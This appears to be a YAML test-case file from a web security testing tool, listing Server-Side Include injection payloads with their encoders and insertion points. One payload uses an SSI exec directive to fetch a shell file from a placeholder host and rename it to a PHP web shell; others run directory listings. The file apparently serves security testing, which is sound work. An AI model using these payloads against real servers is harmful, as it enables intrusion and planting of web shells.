gitex2026/AttackSurface/dist/testcases/owasp/ss-include.yml
2026-04-24 19:18:37 +00:00

13 lines
272 B
YAML

payload:
- <!--#exec cmd="wget http://some_host/shell.txt | rename shell.txt shell.php"-->
- <!--#exec cmd="ls" -->
- <!--#exec cmd="dir" -->
encoder:
- Base64Flat
- URL
placeholder:
- URLPath
- URLParam
- HTMLForm
- HTMLMultipartForm
type: SS Injection